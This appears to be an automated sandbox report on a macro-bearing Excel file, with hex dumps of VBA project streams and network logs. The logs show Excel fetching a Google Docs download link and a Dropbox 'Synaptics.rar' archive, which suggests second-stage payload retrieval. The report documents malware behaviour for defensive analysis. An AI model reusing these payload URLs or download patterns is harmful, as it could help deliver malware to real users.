                            Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 48 65 6c 70 46 69 6c 65 3d 22 22 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22
                            General
                            Stream Path:PROJECTwm
                            CLSID:
                            File Type:data
                            Stream Size:41
                            Entropy:2.7478777776526524
                            Base64 Encoded:False
                            Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . . .
                            Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 00 00
                            General
                            Stream Path:VBA/_VBA_PROJECT
                            CLSID:
                            File Type:data
                            Stream Size:3502
                            Entropy:4.951751659616407
                            Base64 Encoded:False
                            Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o
                            Data Raw:cc 61 af 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                            General
                            Stream Path:VBA/__SRP_0
                            CLSID:
                            File Type:data
                            Stream Size:1652
                            Entropy:4.357408478574171
                            Base64 Encoded:False
                            Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . h ) h * O r \\ . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . y . . . . . . . . . . . . . . . . . . . . . 9 . . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . .
                            Data Raw:93 4b 2a af 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 07 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 80 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 05 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 05 00 00 7e 66 00 00 7f 00 00 00 00
                            General
                            Stream Path:VBA/__SRP_1
                            CLSID:
                            File Type:data
                            Stream Size:298
                            Entropy:3.310015148206106
                            Base64 Encoded:False
                            Data ASCII:r U . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . C a n c e l . . . . . . . . S h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T a r g e t . . . . . . . . S a v e A s U I . . . . . . . . D I R . . . . . . . . i _ R e g K e y . . . . . . . . i _ V a l u e . . . . . . . . i _ T y p e . . . . . . . . M Y U . . . . . . . . N M A . . . . . . . . . .
                            Data Raw:72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 01 00 00 7e 01 00 00 7e 79 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 03 00 00 09 19 03 00 00 00 00 00 00 31 06 00 00 00 00 00 00 08 00 00 00 00 00 01 00 02 00 00 08 06 00 00 00 43 61 6e 63 65 6c 01 00 00 08 02 00 00 00 53 68 03 00
                            General
                            Stream Path:VBA/__SRP_2
                            CLSID:
                            File Type:data
                            Stream Size:1284
                            Entropy:2.289242959637628
                            Base64 Encoded:False
                            Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . / . 8 . . . 1 . . . . . . . a . . . . . . . Y . . . . . . . . . . . . . . . ` . . . . . . . ` . . . . . . . ` . . . . . . . ` . . . . . . . ` . . . . . . . ` . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . W . . . . . . . . . .
                            Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 30 00 00 00 00 00 00 00 0c 00 0c 00 00 00 00 00 01 00 01 00 00 00 01 00 b9 05 00 00 00 00 00 00 e1 05 00 00 00 00 00 00 09 06 00 00 00 00 00 00 ff ff ff ff 91 05 00 00 00 00 00 00 08 00 2f 00 38 00 00 00 31 06 00 00 00 00 00 00 61 00 00 00 00 00 01 00 59 06
                            General
                            Stream Path:VBA/__SRP_3
                            CLSID:
                            File Type:data
                            Stream Size:682
                            Entropy:3.010107002295994
                            Base64 Encoded:False
                            Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . . $ . . . . . . . . . . . . ` . . X . . . . . . . . . . . . ( . A . . . . . . . . . . ` . . \\ . . . . . . . . . . . . . . . . . . # 0 . . . . . . . . . . . ` . . ` . $ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . ` . . d . ( . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . ` . . h . , . . . . . . . . . . . . . . . . . . , . A . . . . . . . . . . ` . . l . 0 . . . . . .
                            Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 44 00 00 00 04 00 24 00 01 01 00 00 00 00 02 00 00 00 03 60 00 00 58 04 1c 00 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 1e 28 00 41 01 00 00 00 00 02 00 01 00 03 60 04 00 5c 04 20 00 ff ff ff ff ff ff ff ff 00 00 00 00 81 00 00 00 00 00 01
                            General
                            Stream Path:VBA/dir
                            CLSID:
                            File Type:data
                            Stream Size:481
                            Entropy:6.240073968176633
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . v V . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
                            Data Raw:01 dd b1 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 91 b8 76 56 01 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                            TimestampSource PortDest PortSource IPDest IP
                            Dec 30, 2024 11:05:36.746258974 CET49775443192.168.2.24142.250.184.206
                            Dec 30, 2024 11:05:36.746308088 CET44349775142.250.184.206192.168.2.24
                            Dec 30, 2024 11:05:36.746362925 CET49775443192.168.2.24142.250.184.206
                            Dec 30, 2024 11:05:36.747534990 CET49775443192.168.2.24142.250.184.206
                            Dec 30, 2024 11:05:36.747555971 CET44349775142.250.184.206192.168.2.24
                            Dec 30, 2024 11:05:37.353051901 CET44349775142.250.184.206192.168.2.24
                            Dec 30, 2024 11:05:37.355362892 CET49775443192.168.2.24142.250.184.206
                            Dec 30, 2024 11:05:37.355377913 CET44349775142.250.184.206192.168.2.24
                            Dec 30, 2024 11:05:37.355874062 CET44349775142.250.184.206192.168.2.24
                            Dec 30, 2024 11:05:37.355964899 CET49775443192.168.2.24142.250.184.206
                            Dec 30, 2024 11:05:37.356615067 CET44349775142.250.184.206192.168.2.24
                            Dec 30, 2024 11:05:37.356764078 CET49775443192.168.2.24142.250.184.206
                            Dec 30, 2024 11:05:37.362051964 CET49775443192.168.2.24142.250.184.206
                            Dec 30, 2024 11:05:37.362173080 CET44349775142.250.184.206192.168.2.24
                            Dec 30, 2024 11:05:37.362936974 CET49775443192.168.2.24142.250.184.206
                            Dec 30, 2024 11:05:37.362951994 CET44349775142.250.184.206192.168.2.24
                            Dec 30, 2024 11:05:37.405756950 CET49775443192.168.2.24142.250.184.206
                            Dec 30, 2024 11:05:37.743505955 CET44349775142.250.184.206192.168.2.24
                            Dec 30, 2024 11:05:37.743546009 CET44349775142.250.184.206192.168.2.24
                            Dec 30, 2024 11:05:37.743633032 CET49775443192.168.2.24142.250.184.206
                            Dec 30, 2024 11:05:37.743648052 CET44349775142.250.184.206192.168.2.24
                            Dec 30, 2024 11:05:37.744543076 CET44349775142.250.184.206192.168.2.24
                            Dec 30, 2024 11:05:37.744667053 CET49775443192.168.2.24142.250.184.206
                            Dec 30, 2024 11:05:37.744730949 CET49775443192.168.2.24142.250.184.206
                            Dec 30, 2024 11:05:37.744748116 CET44349775142.250.184.206192.168.2.24
                            Dec 30, 2024 11:05:37.781887054 CET49777443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:05:37.781932116 CET44349777162.125.66.18192.168.2.24
                            Dec 30, 2024 11:05:37.782010078 CET49777443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:05:37.783236027 CET49777443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:05:37.783252001 CET44349777162.125.66.18192.168.2.24
                            Dec 30, 2024 11:05:38.392313957 CET44349777162.125.66.18192.168.2.24
                            Dec 30, 2024 11:05:38.413691998 CET49777443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:05:38.413712025 CET44349777162.125.66.18192.168.2.24
                            Dec 30, 2024 11:05:38.415046930 CET44349777162.125.66.18192.168.2.24
                            Dec 30, 2024 11:05:38.415121078 CET49777443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:05:38.470453978 CET49777443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:05:38.470640898 CET44349777162.125.66.18192.168.2.24
                            Dec 30, 2024 11:05:38.471236944 CET49777443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:05:38.471251965 CET44349777162.125.66.18192.168.2.24
                            Dec 30, 2024 11:05:38.515562057 CET49777443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:05:38.850651979 CET44349777162.125.66.18192.168.2.24
                            Dec 30, 2024 11:05:38.850723982 CET44349777162.125.66.18192.168.2.24
                            Dec 30, 2024 11:05:38.850776911 CET49777443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:05:38.851778030 CET49777443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:05:38.851778030 CET49777443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:05:38.851799011 CET44349777162.125.66.18192.168.2.24
                            Dec 30, 2024 11:05:38.851809025 CET44349777162.125.66.18192.168.2.24
                            Dec 30, 2024 11:05:38.870296001 CET49778443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:05:38.870338917 CET44349778162.125.66.18192.168.2.24
                            Dec 30, 2024 11:05:38.870414972 CET49778443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:05:38.871493101 CET49778443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:05:38.871507883 CET44349778162.125.66.18192.168.2.24
                            Dec 30, 2024 11:05:39.501707077 CET44349778162.125.66.18192.168.2.24
                            Dec 30, 2024 11:05:39.503179073 CET49778443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:05:39.503206968 CET44349778162.125.66.18192.168.2.24
                            Dec 30, 2024 11:05:39.504291058 CET44349778162.125.66.18192.168.2.24
                            Dec 30, 2024 11:05:39.504371881 CET49778443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:05:39.505456924 CET49778443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:05:39.505523920 CET44349778162.125.66.18192.168.2.24
                            Dec 30, 2024 11:05:39.505897045 CET49778443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:05:39.505903006 CET44349778162.125.66.18192.168.2.24
                            Dec 30, 2024 11:05:39.546785116 CET49778443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:05:39.969212055 CET44349778162.125.66.18192.168.2.24
                            Dec 30, 2024 11:05:39.969834089 CET44349778162.125.66.18192.168.2.24
                            Dec 30, 2024 11:05:39.969902992 CET49778443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:05:39.969939947 CET49778443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:05:39.969959974 CET44349778162.125.66.18192.168.2.24
                            Dec 30, 2024 11:05:39.969970942 CET49778443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:05:39.969976902 CET44349778162.125.66.18192.168.2.24
                            Dec 30, 2024 11:06:46.713216066 CET49799443192.168.2.24142.250.184.206
                            Dec 30, 2024 11:06:46.713268042 CET44349799142.250.184.206192.168.2.24
                            Dec 30, 2024 11:06:46.713378906 CET49799443192.168.2.24142.250.184.206
                            Dec 30, 2024 11:06:46.715759039 CET49799443192.168.2.24142.250.184.206
                            Dec 30, 2024 11:06:46.715783119 CET44349799142.250.184.206192.168.2.24
                            Dec 30, 2024 11:06:47.319791079 CET44349799142.250.184.206192.168.2.24
                            Dec 30, 2024 11:06:47.321455956 CET49799443192.168.2.24142.250.184.206
                            Dec 30, 2024 11:06:47.321480989 CET44349799142.250.184.206192.168.2.24
                            Dec 30, 2024 11:06:47.321870089 CET44349799142.250.184.206192.168.2.24
                            Dec 30, 2024 11:06:47.322089911 CET49799443192.168.2.24142.250.184.206
                            Dec 30, 2024 11:06:47.322596073 CET44349799142.250.184.206192.168.2.24
                            Dec 30, 2024 11:06:47.322715044 CET49799443192.168.2.24142.250.184.206
                            Dec 30, 2024 11:06:47.330440044 CET49799443192.168.2.24142.250.184.206
                            Dec 30, 2024 11:06:47.330545902 CET44349799142.250.184.206192.168.2.24
                            Dec 30, 2024 11:06:47.376276970 CET49799443192.168.2.24142.250.184.206
                            Dec 30, 2024 11:06:47.376307011 CET44349799142.250.184.206192.168.2.24
                            Dec 30, 2024 11:06:47.388998985 CET49799443192.168.2.24142.250.184.206
                            Dec 30, 2024 11:06:47.431340933 CET44349799142.250.184.206192.168.2.24
                            Dec 30, 2024 11:06:47.716067076 CET44349799142.250.184.206192.168.2.24
                            Dec 30, 2024 11:06:47.716115952 CET44349799142.250.184.206192.168.2.24
                            Dec 30, 2024 11:06:47.716155052 CET49799443192.168.2.24142.250.184.206
                            Dec 30, 2024 11:06:47.716169119 CET44349799142.250.184.206192.168.2.24
                            Dec 30, 2024 11:06:47.717231989 CET44349799142.250.184.206192.168.2.24
                            Dec 30, 2024 11:06:47.717281103 CET49799443192.168.2.24142.250.184.206
                            Dec 30, 2024 11:06:47.718236923 CET49799443192.168.2.24142.250.184.206
                            Dec 30, 2024 11:06:47.718254089 CET44349799142.250.184.206192.168.2.24
                            Dec 30, 2024 11:06:47.718265057 CET49799443192.168.2.24142.250.184.206
                            Dec 30, 2024 11:06:47.718271017 CET44349799142.250.184.206192.168.2.24
                            Dec 30, 2024 11:06:47.741029978 CET49801443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:06:47.741089106 CET44349801162.125.66.18192.168.2.24
                            Dec 30, 2024 11:06:47.741166115 CET49801443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:06:47.742222071 CET49801443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:06:47.742233038 CET44349801162.125.66.18192.168.2.24
                            Dec 30, 2024 11:06:48.348009109 CET44349801162.125.66.18192.168.2.24
                            Dec 30, 2024 11:06:48.349539995 CET49801443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:06:48.349555016 CET44349801162.125.66.18192.168.2.24
                            Dec 30, 2024 11:06:48.350580931 CET44349801162.125.66.18192.168.2.24
                            Dec 30, 2024 11:06:48.350649118 CET49801443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:06:48.352087975 CET49801443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:06:48.352159023 CET44349801162.125.66.18192.168.2.24
                            Dec 30, 2024 11:06:48.352668047 CET49801443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:06:48.352674961 CET44349801162.125.66.18192.168.2.24
                            Dec 30, 2024 11:06:48.407532930 CET49801443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:06:48.811763048 CET44349801162.125.66.18192.168.2.24
                            Dec 30, 2024 11:06:48.811837912 CET44349801162.125.66.18192.168.2.24
                            Dec 30, 2024 11:06:48.811922073 CET49801443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:06:48.812195063 CET49801443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:06:48.812211037 CET44349801162.125.66.18192.168.2.24
                            Dec 30, 2024 11:06:48.812220097 CET49801443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:06:48.812226057 CET44349801162.125.66.18192.168.2.24
                            Dec 30, 2024 11:06:48.829870939 CET49802443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:06:48.829906940 CET44349802162.125.66.18192.168.2.24
                            Dec 30, 2024 11:06:48.830024958 CET49802443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:06:48.831118107 CET49802443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:06:48.831135988 CET44349802162.125.66.18192.168.2.24
                            Dec 30, 2024 11:06:49.424551964 CET44349802162.125.66.18192.168.2.24
                            Dec 30, 2024 11:06:49.426101923 CET49802443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:06:49.426131964 CET44349802162.125.66.18192.168.2.24
                            Dec 30, 2024 11:06:49.427207947 CET44349802162.125.66.18192.168.2.24
                            Dec 30, 2024 11:06:49.427272081 CET49802443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:06:49.428664923 CET49802443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:06:49.428750038 CET44349802162.125.66.18192.168.2.24
                            Dec 30, 2024 11:06:49.429251909 CET49802443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:06:49.429259062 CET44349802162.125.66.18192.168.2.24
                            Dec 30, 2024 11:06:49.470051050 CET49802443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:06:49.889503002 CET44349802162.125.66.18192.168.2.24
                            Dec 30, 2024 11:06:49.889600992 CET44349802162.125.66.18192.168.2.24
                            Dec 30, 2024 11:06:49.889662027 CET49802443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:06:49.889987946 CET49802443192.168.2.24162.125.66.18
                            Dec 30, 2024 11:06:49.890006065 CET44349802162.125.66.18192.168.2.24
                            TimestampSource PortDest PortSource IPDest IP
                            Dec 30, 2024 11:05:36.738728046 CET5002453192.168.2.241.1.1.1
                            Dec 30, 2024 11:05:36.745523930 CET53500241.1.1.1192.168.2.24
                            Dec 30, 2024 11:05:37.773735046 CET4952353192.168.2.241.1.1.1
                            Dec 30, 2024 11:05:37.780895948 CET53495231.1.1.1192.168.2.24
                            Dec 30, 2024 11:06:47.733584881 CET5213453192.168.2.241.1.1.1
                            Dec 30, 2024 11:06:47.740233898 CET53521341.1.1.1192.168.2.24
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Dec 30, 2024 11:05:36.738728046 CET192.168.2.241.1.1.10xf37eStandard query (0)docs.google.comA (IP address)IN (0x0001)false
                            Dec 30, 2024 11:05:37.773735046 CET192.168.2.241.1.1.10xb4ceStandard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                            Dec 30, 2024 11:06:47.733584881 CET192.168.2.241.1.1.10x2e6Standard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Dec 30, 2024 11:05:36.745523930 CET1.1.1.1192.168.2.240xf37eNo error (0)docs.google.com142.250.184.206A (IP address)IN (0x0001)false
                            Dec 30, 2024 11:05:37.780895948 CET1.1.1.1192.168.2.240xb4ceNo error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                            Dec 30, 2024 11:05:37.780895948 CET1.1.1.1192.168.2.240xb4ceNo error (0)www-env.dropbox-dns.com162.125.66.18A (IP address)IN (0x0001)false
                            Dec 30, 2024 11:06:47.740233898 CET1.1.1.1192.168.2.240x2e6No error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                            Dec 30, 2024 11:06:47.740233898 CET1.1.1.1192.168.2.240x2e6No error (0)www-env.dropbox-dns.com162.125.66.18A (IP address)IN (0x0001)false
                            • docs.google.com
                            • www.dropbox.com
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.2449775142.250.184.2064436836C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            TimestampBytes transferredDirectionData
                            2024-12-30 10:05:37 UTC192OUTGET /uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                            Host: docs.google.com
                            2024-12-30 10:05:37 UTC1223INHTTP/1.1 404 Not Found
                            Content-Type: text/html; charset=utf-8
                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                            Pragma: no-cache
                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                            Date: Mon, 30 Dec 2024 10:05:37 GMT
                            Strict-Transport-Security: max-age=31536000
                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                            Cross-Origin-Opener-Policy: same-origin
                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                            Content-Security-Policy: script-src 'nonce-jqrAj6mEpumdAWIoNLK2jA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                            Server: ESF
                            X-XSS-Protection: 0
                            X-Content-Type-Options: nosniff
                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                            Accept-Ranges: none
                            Vary: Accept-Encoding
                            Connection: close
                            Transfer-Encoding: chunked
                            2024-12-30 10:05:37 UTC167INData Raw: 36 37 34 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69
                            Data Ascii: 674<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</ti
                            2024-12-30 10:05:37 UTC1390INData Raw: 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 73 46 57 36 6d 4e 4e 77 47 66 54 30 6a 64 42 62 79 33 52 6d 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 3b 7d 2a
                            Data Ascii: tle><style nonce="4sFW6mNNwGfT0jdBby3RmQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}*
                            2024-12-30 10:05:37 UTC102INData Raw: 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                            Data Ascii: ror.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                            2024-12-30 10:05:37 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.2449777162.125.66.184436836C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            TimestampBytes transferredDirectionData
                            2024-12-30 10:05:38 UTC178OUTGET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                            Host: www.dropbox.com
                            2024-12-30 10:05:38 UTC825INHTTP/1.1 409 Conflict
                            Content-Security-Policy: script-src 'none'
                            Content-Security-Policy: sandbox
                            Pragma: no-cache
                            Referrer-Policy: strict-origin-when-cross-origin
                            Set-Cookie: gvc=MzM0NDM0Mjc2MjEzODU1MDc2NjczOTQ1NzczMzg2MDY2MzA0NDQ=; Path=/; Expires=Sat, 29 Dec 2029 10:05:38 GMT; HttpOnly; Secure; SameSite=None
                            X-Content-Type-Options: nosniff
                            X-Permitted-Cross-Domain-Policies: none
                            X-Robots-Tag: noindex, nofollow, noimageindex
                            X-Xss-Protection: 1; mode=block
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 1121
                            Date: Mon, 30 Dec 2024 10:05:38 GMT
                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                            Server: envoy
                            Cache-Control: no-cache, no-store
                            Vary: Accept-Encoding
                            X-Dropbox-Response-Origin: far_remote
                            X-Dropbox-Request-Id: d381fd000c784468ab2f948996fa3595
                            Connection: close
